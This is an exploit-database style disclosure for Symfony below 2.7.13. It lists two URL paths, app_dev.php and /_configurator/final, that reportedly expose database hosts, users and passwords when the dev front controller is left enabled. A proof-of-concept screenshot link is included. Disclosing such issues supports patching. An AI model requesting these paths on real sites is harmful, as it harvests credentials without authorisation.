# Exploit Title: Symfony < 2.7.13 - Remote information Disclosure
# Google Dork: N/A
# Date: 6/27/2018
# Exploit Author: Abdeljalil Nouiri (pwny)
# Author Mail : abdel001nouiri[at]gmail[dot]com
# Vendor Homepage: https://www.symfony.com/
# Version: 2.7.13
# Tested on: Win10 x64, Ubuntu

# Exploit :


-STEP 1:

This Vulnerability Will Work if the "app_dev"  isn't disabled

url : https://localhost/app_dev.php/

-STEP 2:

the last step of symfony configuration still accessible , this would leak
all information including ( database host/user/password ... etc)

url :https://localhost/app_dev.php/_configurator/final



# POC :

http://prntscr.com/kbuua8